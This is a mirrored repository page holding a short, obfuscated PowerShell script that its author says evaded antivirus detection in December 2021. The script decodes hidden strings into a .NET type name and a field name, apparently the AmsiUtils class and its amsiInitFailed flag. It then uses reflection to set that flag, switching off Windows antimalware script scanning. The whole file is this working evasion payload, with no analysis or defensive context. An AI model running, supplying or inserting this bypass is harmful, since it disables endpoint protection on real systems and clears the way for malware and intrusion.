mirror of
https://github.com/tihanyin/PSSW100AVB
synced 2026-06-21 14:11:13 +00:00
13 lines
457 B
PowerShell
13 lines
457 B
PowerShell
#Twitter: @TihanyiNorbert (No AV detecetion 2021 December)
|
|
#Based on the original work of Matt Graeber @mattifestation script.
|
|
$A="5492868772801748688168747280728187173688878280688776"
|
|
$B="8281173680867656877679866880867644817687416876797271"
|
|
function C($n, $m){
|
|
[string]($n..$m|%{[char][int](29+($A+$B).
|
|
substring(($_*2),2))})-replace " "}
|
|
$k=C 0 37; $r=C 38 51
|
|
$a=[Ref].Assembly.GetType($k)
|
|
$a.GetField($r,'NonPublic,Static').SetValue($null,$true)
|
|
|
|
|